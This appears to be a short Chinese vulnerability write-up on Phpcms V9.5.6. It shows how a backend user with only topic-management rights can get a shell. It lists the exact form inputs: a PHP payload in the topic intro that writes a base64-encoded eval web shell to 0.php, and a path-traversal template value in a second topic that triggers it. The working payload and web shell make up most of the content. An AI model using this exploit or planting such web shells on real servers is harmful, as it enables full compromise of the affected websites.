简要描述:
低权限后台拿shell
版本:Phpcms V9.5.6 Release 20140522
详细说明:
前提是需要有管理专题的权限
测试版本
PHPCMS程序版本:Phpcms V9.5.6 Release 20140522
过程
添加专题专题名称:test
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
<?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==’)); ?>
专题生成目录:test000
专题子分类:test test
其他默认 -> 提交
1.jpg

  1. 再次添加专题
    专题名称:test1

专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
专题生成目录:test111
专题子分类:test test
扩展设置
专题模板:value设置为../../../../html/special/test000/index
其他默认 -> 提交
2.jpg
3.jpg
会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>
漏洞证明:
4.jpg

标签: none

评论已关闭